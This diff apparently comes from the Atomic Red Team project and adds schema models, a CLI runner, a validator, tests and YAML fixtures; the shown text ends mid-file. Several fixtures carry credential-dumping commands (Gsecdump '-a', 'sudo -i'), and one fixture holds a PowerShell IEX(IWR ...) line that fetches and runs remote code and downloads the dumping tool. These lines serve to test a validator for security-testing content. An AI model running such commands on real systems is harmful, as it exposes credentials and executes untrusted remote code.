+    str, StringConstraints(pattern=r"T\d{4}(?:\.\d{3})?", min_length=5)
+]
+
+
+def extract_mustached_keys(commands: List[Optional[str]]) -> List[str]:
+    result = []
+    for command in commands:
+        if command:
+            matches = re.finditer(r"#{(.*?)}", command, re.MULTILINE)
+            keys = [list(i.groups()) for i in matches]
+            keys = list(reduce(lambda x, y: x + y, keys, []))
+            result.extend(keys)
+    return list(set(result))
+
+
+def get_supported_platform(platform: Platform):
+    platforms = {
+        "macos": "macOS",
+        "office-365": "Office 365",
+        "windows": "Windows",
+        "linux": "Linux",
+        "azure-ad": "Azure AD",
+        "iaas": "IaaS",
+        "saas": "SaaS",
+        "iaas:aws": "AWS",
+        "iaas:azure": "Azure",
+        "iaas:gcp": "GCP",
+        "google-workspace": "Google Workspace",
+        "containers": "Containers",
+        "esxi": "ESXi",
+    }
+    return platforms[platform]
+
+
+def get_language(executor: ExecutorType):
+    if executor == "command_prompt":
+        return "cmd"
+    elif executor == "manual":
+        return ""
+    return executor
+
+
+class BaseArgument(TypedDict):
+    description: str
+
+
+class UrlArg(BaseArgument):
+    default: Optional[DomainName | AnyUrl | IPvAnyAddress]
+    type: Literal["url", "Url"]
+
+    @field_serializer("default")
+    def serialize_url(self, value):
+        return str(value)
+
+
+class StringArg(BaseArgument):
+    default: Optional[str]
+    type: Literal["string", "path", "String", "Path"]
+
+
+class IntArg(BaseArgument):
+    default: Optional[int]
+    type: Literal["integer", "Integer"]
+
+
+class FloatArg(BaseArgument):
+    default: Optional[StrictFloat]
+    type: Literal["float", "Float"]
+
+
+Argument = Annotated[
+    Union[FloatArg, IntArg, UrlArg, StringArg], Field(discriminator="type")
+]
+
+
+class StrictModel(BaseModel):
+    model_config = ConfigDict(
+        validate_default=True, extra="forbid", validate_assignment=True
+    )
+
+
+class Executor(StrictModel):
+    name: ExecutorType
+    elevation_required: bool = False
+
+
+class ManualExecutor(Executor):
+    name: Literal["manual"]
+    steps: str = Field(..., min_length=10)
+
+
+class CommandExecutor(Executor):
+    name: Literal["powershell", "sh", "bash", "command_prompt"]
+    command: constr(min_length=1)
+    cleanup_command: Optional[str] = None
+
+
+class Dependency(StrictModel):
+    description: constr(min_length=1)
+    prereq_command: constr(min_length=1)
+    get_prereq_command: Optional[str]
+
+
+class Atomic(StrictModel):
+    test_number: Optional[str] = None
+    name: constr(min_length=1)
+    description: constr(min_length=1)
+    supported_platforms: conlist(Platform, min_length=1)
+    executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
+    dependencies: Optional[List[Dependency]] = []
+    input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
+    dependency_executor_name: Optional[ExecutorType] = None
+    auto_generated_guid: Optional[UUID] = None
+
+    @classmethod
+    def extract_mustached_keys(cls, value: dict) -> List[str]:
+        commands = []
+        executor = value.get("executor")
+        if isinstance(executor, CommandExecutor):
+            commands = [executor.command, executor.cleanup_command]
+        if isinstance(executor, ManualExecutor):
+            commands = [executor.steps]
+        for d in value.get("dependencies") or []:
+            commands.extend([d.get_prereq_command, d.prereq_command])
+        return extract_mustached_keys(commands)
+
+    @field_validator("dependency_executor_name", mode="before")  # noqa
+    @classmethod
+    def validate_dep_executor(cls, v, info: ValidationInfo):
+        if v is not None and info.data.get("dependencies") == []:
+            raise PydanticCustomError(
+                "invalid_dependency_executor_name",
+                "'dependency_executor_name' is not needed if there are no dependencies. Remove the key from YAML",
+                {"loc": ["dependency_executor_name"], "input": None},
+            )
+        return v
+
+    @model_validator(mode="after")
+    def validate_elevation_required(self):
+        if (
+            ("linux" in self.supported_platforms or "macos" in self.supported_platforms)
+            and not self.executor.elevation_required
+            and isinstance(self.executor, CommandExecutor)
+        ):
+            commands = [self.executor.command]
+            if self.executor.cleanup_command:
+                commands.append(self.executor.cleanup_command)
+
+            if any(["sudo" in cmd for cmd in commands]):
+                raise PydanticCustomError(
+                    "elevation_required_but_not_provided",
+                    "'elevation_required' shouldn't be empty/false. Since `sudo` is used, set `elevation_required` to true`",
+                    {
+                        "loc": ["executor", "elevation_required"],
+                        "input": self.executor.elevation_required,
+                    },
+                )
+        return self
+
+    @field_validator("input_arguments", mode="before")  # noqa
+    @classmethod
+    def validate(cls, v, info: ValidationInfo):
+        if v is None:
+            raise PydanticCustomError(
+                "empty_input_arguments",
+                "'input_arguments' shouldn't be empty. Provide a valid value or remove the key from YAML",
+                {"loc": ["input_arguments"], "input": None},
+            )
+
+        atomic = info.data
+        keys = cls.extract_mustached_keys(atomic)
+        for key, _value in v.items():
+            if key not in keys:
+                raise PydanticCustomError(
+                    "unused_input_argument",
+                    f"'{key}' is not used in any of the commands",
+                    {"loc": ["input_arguments", key], "input": key},
+                )
+            else:
+                keys.remove(key)
+
+        if len(keys) > 0:
+            for x in keys:
+                raise PydanticCustomError(
+                    "missing_input_argument",
+                    f"{x} is not defined in input_arguments",
+                    {"loc": ["input_arguments"]},
+                )
+        return v
+
+
+class Technique(StrictModel):
+    attack_technique: AttackTechniqueID
+    display_name: str = Field(..., min_length=5)
+    atomic_tests: List[Atomic] = Field(min_length=1)
+
+    @model_validator(mode="before")
+    @classmethod
+    def validate_dependency_executor_names(cls, data):
+        """Check if dependency_executor_name keys are present with empty/None values in atomic tests"""
+        if isinstance(data, dict) and "atomic_tests" in data:
+            atomic_tests = data.get("atomic_tests", [])
+            for i, test in enumerate(atomic_tests):
+                if isinstance(test, dict) and "dependency_executor_name" in test:
+                    value = test.get("dependency_executor_name")
+                    # If the key exists but value is None or empty string, that's an error
+                    if value is None or value == "":
+                        raise PydanticCustomError(
+                            "empty_dependency_executor_name",
+                            "'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
+                            "'bash', 'command_prompt'] or remove the key from YAML",
+                            {"loc": ["atomic_tests", i, "dependency_executor_name"], "input": value},
+                        )
+        return data
+
+    def model_post_init(self, __context) -> None:
+        for index in range(len(self.atomic_tests)):
+            test_number = f"{self.attack_technique}-{index + 1}"
+            self.atomic_tests[index].test_number = test_number

atomic_red_team/runner.py

@@ -0,0 +1,111 @@
+import glob
+import json
+import os
+import sys
+import urllib.parse
+from collections import defaultdict
+from functools import partial
+from typing import Annotated
+
+import typer
+from pydantic import ValidationError
+
+from atomic_red_team.common import used_guids_file, atomics_path
+from atomic_red_team.guid import (
+    generate_guids_for_yaml,
+    get_unique_guid,
+)
+from atomic_red_team.labels import GithubAPI
+from atomic_red_team.models import Technique
+from atomic_red_team.validator import Validator, format_validation_error, yaml
+
+app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
+
+
+@app.command()
+def generate_guids():
+    """Generates missing GUIDs for the atomic files"""
+    with open(used_guids_file, "r") as file:
+        used_guids = file.readlines()
+
+    for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
+        generate_guids_for_yaml(file, partial(get_unique_guid, guids=used_guids))
+
+
+@app.command()
+def generate_schemas():
+    """Generates JSON and YAML schemas for techniques"""
+    schema = Technique.model_json_schema()  # (1)!
+    with open("schema.yaml", "w") as f:
+        yaml.default_flow_style = False
+        yaml.dump(schema, f)
+    with open("schema.json", "w") as f:
+        f.write(json.dumps(schema, indent=2))
+
+
+@app.command()
+def generate_counter():
+    """Generate atomic tests count svg"""
+    test_count = 0
+    for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
+        with open(file, "r") as f:
+            yaml_data = yaml.load(f)
+            if yaml_data is not None and "atomic_tests" in yaml_data:
+                test_count += len(yaml_data["atomic_tests"])
+    # Generate the shields.io badge URL
+    params = {"label": "Atomics", "message": str(test_count), "style": "flat"}
+    url = "https://img.shields.io/badge/{}-{}-{}.svg".format(
+        urllib.parse.quote_plus(params["label"]),
+        urllib.parse.quote_plus(params["message"]),
+        urllib.parse.quote_plus(params["style"]),
+    )
+
+    # Save shields URL in GitHub Output to be used in the next step.
+    with open(os.environ["GITHUB_OUTPUT"], "a") as fh:
+        print(f"result={url}", file=fh)
+
+
+@app.command()
+def generate_labels(
+    pull_request: Annotated[str, typer.Option("--pr")],
+    token: Annotated[str, typer.Option("--token")],
+):
+    """Generate labels for a pull request."""
+    api = GithubAPI(token)
+    api.save_labels_and_maintainers(pull_request)
+
+
+@app.command()
+def validate():
+    """
+    Validate all the atomic techniques in a directory.
+    """
+
+    validator = Validator()
+    errors = defaultdict(list)
+
+    for folder in glob.glob(f"{atomics_path}/T*"):
+        for item in os.scandir(folder):
+            try:
+                validator.validate(item)
+            except ValidationError as error:
+                errors[item.path].append(error)
+
+    if len(errors) == 0:
+        print("Validation successful")
+    else:
+        print("Validation failed")
+        for i, errors in errors.items():
+            print(f"Error occurred with {i.replace(f'{atomics_path}/', '')}.")
+            print("Each of the following are why it failed:")
+            for error in errors:
+                if isinstance(error, ValidationError):
+                    for k, v in format_validation_error(error).items():
+                        print(f"\n\tInvalid {'.'.join(map(str, v))}: {k}\n")
+                else:
+                    print(f"\n\t{error}\n")
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    app()

atomic_red_team/spec.yaml

@@ -1,195 +0,0 @@
-#
-# This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
-#
-# The directory structure is:
-# - These tests reside in the `atomics` directory
-# - One directory per ATT&CK technique, named "T1234"
-# - All the atomic tests for a technique in a file called "T1234.yaml" inside that directory
-# - Any payloads, supporting materials, etc for the atomic tests also live in that directory
-#
-# For example:
-#
-#   atomic_red_team/
-#   atomic_red_team/atomics
-#   atomic_red_team/atomics/T1234
-#   atomic_red_team/atomics/T1234/T1234.yaml      <-- this is where all the atomic tests live
-#   atomic_red_team/atomics/T1234/src/payload1.sct    <-- a payload file needed by one of the T1234 atomics (human readable)
-#   atomic_red_team/atomics/T1234/bin/payload2.dll    <-- another payload file needed by one of the T1234 atomics (binary)
-#
-# In general, a set of atomic tests for a technique should never depend on payloads
-# or supporting files from other atomic directories. We want to keep things nice and close.
-# Use git symlinks if you really need to share files between techniques.
-#
-# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
-# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
-#
-# To validate your atomics, run `bin/validate_atomics.rb`
----
-attack_technique: TXXXX # (with a capital T, Example: 'T1123')
-display_name: Name of the technique as defined by ATT&CK. # Example: 'Audio Capture'
-
-# `atomic_tests` is an array of distinct test cases inside this technique. A test case should
-# include ALL of the information needed to run that test (ie, this is the "atomic" - you don't
-# distribute steps across different atomics)
-# Each of these tests is a YAML array element (starts with a `-`).
-atomic_tests:
-
-#
-# This is the first atomic test
-#
-- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
-  auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
-  description: |
-    Long form description of the test. Markdown is supported so you can **bold** items, create
-
-    - one list
-    - two list
-    - red list
-    - [blue list](https://google.com)
-
-  # supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
-  # - windows
-  # - macos
-  # - linux
-  supported_platforms:
-    - windows
-
-  # inputs to the atomic test that are required to run the test (think of these like function arguments).
-  # This is a hash where the key is the input name, value is a hash defining the input argument.
-  input_arguments:
-    # this is the first input argument, called "output_file"
-    output_file:
-      # Short description of the input argument
-      description: xxxxx
-      # data type of the input. Possible values could include:
-      # - Path (a file path)
-      # - Url (a URL)
-      # - String
-      # - Integer
-      # - Float
-      # - really anything else you'd like, but add it to this list
-      type: Path
-      # default value for this argument that will be used if one is not specifid
-      default: test.wma
-
-    # this is a example of a second argument
-    malware_payload_url:
-      description: xxxxx
-      type: Url
-      default: 0000:00:30
-
-  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
-  dependencies: # (optional)
-    # a list of dependies that must be met to successfully run this atomic
-    - description: |
-        TODO
-      prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
-        TODO
-      get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
-        TODO
-
-  #example of two dependencies
-  dependencies:
-  - description: |
-      Sysmon executable must be available
-    prereq_command: |
-      where sysmon > nul
-    get_prereq_command: |
-      echo Automated installer not implemented yet, please install Sysmon manually
-  - description: |
-      Sysmon must be installed
-    prereq_command: |
-      sc query sysmon > nul
-    get_prereq_command: |
-      sysmon -i -accepteula
-
-  # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
-  # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
-  # and `bash` when working on linux OSes.
-  executors:
-  # the name of the executor describes the framework or application in which the test should be executed.
-  #
-  # Each of these executors will have options that the executor needs to run. Possible executors we've imagined
-  # at this time and their required options include:
-  #
-  #   - `command_prompt` : The Windows Command Prompt, aka cmd.exe
-  #       Requires the "command" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: command_prompt
-  #         command: |
-  #           echo "attack starting"
-  #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
-  #
-  #   - `powershell` : Powershell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: powershell
-  #         command: |
-  #           Write-Debug "attack starting"
-  #           Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
-  #
-  #   - `sh` : Linux's bourne shell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: sh
-  #         command: |
-  #           echo "attack starting"
-  #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
-  #
-  #   - `bash` : Linux's bourne again shell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: bash
-  #         command: |
-  #           echo "attack starting"
-  #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
-  #
-  #   - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
-  #              cannot be automated.
-  #
-  #       Requires the `steps` option that tells the user what to do to invoke the test. This is a
-  #       multi-line list of instructions (also preprocessed)
-  #
-  #       Example:
-  #       - name: manual
-  #         steps: |
-  #           1. Navigate to [chrome://extensions](chrome://extensions) and
-  #           tick 'Developer Mode'.
-  #
-  #           2. Click 'Load unpacked extension...' and navigate to
-  #           [Browser_Extension](../T1176/)
-  #
-  #           3. Click the '#{FOOBAR}' button - you can interpolate here too!
-  #
-  - name: command_prompt
-    elevation_required: true 
-    # indicates whether command must be run with admin privileges. 
-    #If the elevation_required attribute is not defined, the value is assumed to be false
-    command: |
-      SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
-    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
-
-#
-# This is the second atomic test
-#
-- name: Echo to the screen
-
-  description: |
-    blah blah blah
-  supported_platforms:
-    - macos
-    - linux
-    
-  # in this example we have no input arguments
-  input_arguments:
-  executors:
-  - name: bash
-    command: echo "Hello world!"

atomic_red_team/test_data/elevation_required_but_not_provided.yaml

@@ -0,0 +1,13 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Root login
+  auto_generated_guid:
+  description: |
+    Login as root.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo -i
+    name: bash

atomic_red_team/test_data/empty_dependency_executor_name.yaml

@@ -0,0 +1,20 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid:
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true
+  dependency_executor_name:

atomic_red_team/test_data/empty_input_arguments.yaml

@@ -0,0 +1,15 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid:
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true

atomic_red_team/test_data/extra_forbidden.yaml

@@ -0,0 +1,14 @@
+attack_technique: W1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  random_field: abc123
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      echo "ART"
+    name: command_prompt

atomic_red_team/test_data/float_type.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: float
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/int_parsing.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: integer
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/invalid_dependency_executor_name.yaml

@@ -0,0 +1,20 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid:
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true
+  dependency_executor_name: "bash"

atomic_red_team/test_data/invalid_filename.yml

@@ -0,0 +1,39 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+    gsecdump_bin_hash:
+      description: File hash of the Gsecdump binary file
+      type: string
+      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
+    gsecdump_url:
+      description: Path to download Gsecdump binary file
+      type: url
+      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Gsecdump must exist on disk at specified location (#{gsecdump_exe})
+    prereq_command: |
+      if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
+      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
+      if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
+        Move-Item $binpath "#{gsecdump_exe}"
+      }
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true

atomic_red_team/test_data/missing_input_argument.yaml

@@ -0,0 +1,13 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/reused_guid.yaml

@@ -0,0 +1,34 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/string_pattern_mismatch.yaml

@@ -0,0 +1,13 @@
+attack_technique: W1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      echo "ART"
+    name: command_prompt

atomic_red_team/test_data/string_too_short.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/unused_input_argument.yaml

@@ -0,0 +1,27 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+    gsecdump_bin_hash:
+      description: File hash of the Gsecdump binary file
+      type: string
+      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
+    gsecdump_url:
+      description: Path to download Gsecdump binary file
+      type: url
+      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+  dependency_executor_name: powershell
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/url_parsing.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: url
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/tests/test_models.py

@@ -0,0 +1,125 @@
+from hypothesis import given, strategies as st, settings, HealthCheck
+from hypothesis.provisional import urls
+from pydantic import AnyUrl
+from pydantic.networks import IPvAnyAddress
+
+from atomic_red_team.models import (
+    Technique,
+    Atomic,
+    StringArg,
+    IntArg,
+    FloatArg,
+    UrlArg,
+    ManualExecutor,
+    Platform,
+    CommandExecutor,
+    ExecutorType,
+)
+
+executor_strategy = st.sampled_from(["powershell", "bash", "sh", "command_prompt"])
+
+st.register_type_strategy(IPvAnyAddress, st.ip_addresses())
+st.register_type_strategy(AnyUrl, urls())
+
+alphanumeric_underscore_strategy = st.text(
+    alphabet=st.sampled_from(
+        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
+    ),
+    min_size=4,
+)
+input_args_types = [
+    st.builds(
+        StringArg,
+        description=st.text(),
+        default=st.text(),
+        type=st.sampled_from(["string", "path", "String", "Path"]),
+    ),
+    st.builds(
+        IntArg,
+        description=st.text(),
+        default=st.integers(),
+        type=st.sampled_from(["integer", "Integer"]),
+    ),
+    st.builds(
+        FloatArg,
+        description=st.text(),
+        default=st.floats(),
+        type=st.sampled_from(["float", "Float"]),
+    ),
+    st.builds(
+        UrlArg,
+        description=st.text(),
+        default=st.one_of(urls(), st.ip_addresses()),
+        type=st.sampled_from(["url", "Url"]),
+    ),
+]
+
+platforms_strategy = st.lists(st.sampled_from(list(Platform.__args__)), min_size=1)
+input_arguments_strategy = st.dictionaries(
+    keys=alphanumeric_underscore_strategy, values=st.one_of(*input_args_types)
+)
+
+atomics_strategy = dict(
+    input_arguments=input_arguments_strategy,
+    name=alphanumeric_underscore_strategy,
+    description=st.text(min_size=5),
+    supported_platforms=platforms_strategy,
+)
+
+
+def atomic_manual_executor_builder():
+    def build_atomic(input_arguments, **kwargs):
+        formatted_args = " ".join(
+            [f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
+        )
+        return Atomic(
+            **kwargs,
+            executor=ManualExecutor(
+                name="manual", steps=f"{formatted_args} Custom steps here..."
+            ),
+            input_arguments=input_arguments,
+        )
+
+    return st.builds(build_atomic, **atomics_strategy)
+
+
+def atomic_command_executor_builder():
+    def build_atomic(input_arguments, executor_name, **kwargs):
+        formatted_args = " ".join(
+            [f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
+        )
+        return Atomic(
+            executor=CommandExecutor(
+                name=executor_name,
+                command=f"{formatted_args} Custom steps here...",
+                elevation_required="sudo" in formatted_args,
+            ),
+            input_arguments=input_arguments,
+            **kwargs,
+        )
+
+    return st.builds(build_atomic, executor_name=executor_strategy, **atomics_strategy)
+
+
+@given(
+    st.builds(
+        Technique,
+        attack_technique=st.integers(min_value=1000, max_value=9999).map(
+            lambda x: f"T{x}"
+        ),
+        atomic_tests=st.lists(
+            st.one_of(
+                atomic_manual_executor_builder(), atomic_command_executor_builder()
+            ),
+            min_size=1,
+        ),
+    )
+)
+@settings(max_examples=500, suppress_health_check=[HealthCheck.too_slow])
+def test_property(instance):
+    assert isinstance(instance, Technique)
+    assert len(instance.attack_technique) > 4
+    assert len(instance.display_name) >= 5
+    for test in instance.atomic_tests:
+        assert isinstance(test, Atomic)
+        assert test.executor.name in ExecutorType.__args__

atomic_red_team/tests/test_validate.py

@@ -0,0 +1,20 @@
+import os
+from os.path import dirname, realpath
+from pathlib import Path
+
+import pytest
+from pydantic import ValidationError
+
+from atomic_red_team.validator import Validator
+
+test_data_path = f"{dirname(dirname(realpath(__file__)))}/test_data"
+
+
+@pytest.mark.parametrize("test_input", list(os.scandir(test_data_path)))
+def test_all_invalid_scenarios(test_input):
+    validator = Validator()
+    with pytest.raises(ValidationError) as exc_info:
+        validator.validate(test_input)
+    error_types = [e["type"] for e in exc_info.value.errors()]
+
+    assert Path(test_input).stem in error_types

atomic_red_team/validator.py

@@ -0,0 +1,117 @@
+import collections
+import fnmatch
+from os import DirEntry
+
+from pydantic import ValidationError
+from pydantic_core import InitErrorDetails, PydanticCustomError
+from ruamel.yaml import YAML
+
+from atomic_red_team.common import atomics_path
+from atomic_red_team.models import Technique
+
+yaml = YAML(typ="safe")
+
+
+def format_validation_error(error: ValidationError):
+    if len(error.errors()) == 1:
+        err = error.errors()[0]
+        message = ""
+        if err["type"] == "elevation_required_but_not_provided":
+            return {err["msg"]: list(err.get("loc")) + err.get("ctx").get("loc")}
+        if err["input"] and err["type"] != "unused_input_argument":
+            message += f"{err['input']} - "
+        return {message + err["msg"]: err.get("loc")}
+    inputs = collections.defaultdict(set)
+    for e in error.errors():
+        if e["type"] == "elevation_required_but_not_provided":
+            return {e["msg"]: e.get("loc") + e.get("ctx").get("loc")}
+        # If it's a union type, then it generates multiple errors for the same input arguments.
+        # Here we collect only the common paths. For example,
+        # [( input_arguments, url_parsing),(input_arguments, string_mismatch)] => (input_arguments)
+        if len(inputs[e["input"]]) == 0:
+            inputs[e["input"]] = e.get("loc", tuple())
+        else:
+            inputs[e["input"]] = tuple(
+                [x for x in inputs[e["input"]] if x in e.get("loc", tuple())]
+            )
+    return dict(inputs)
+
+
+class Validator:
+    def __init__(self):
+        used_guids_path = f"{atomics_path}/used_guids.txt"
+        with open(used_guids_path, "r") as f:
+            self.used_guids = [x.strip() for x in f.readlines()]
+        self.guids = []
+
+    def validate(self, obj: DirEntry):
+        if obj.is_file():
+            if fnmatch.fnmatch(obj.name, "*.y*ml"):
+                self.validate_file(obj)
+        if obj.is_dir():
+            self.validate_directory(obj)
+
+    def validate_file(self, file: DirEntry):
+        """Performs file validation"""
+        self.validate_yaml_extension(file)
+        self.validate_atomic(file)
+
+    def validate_atomic(self, file: DirEntry):
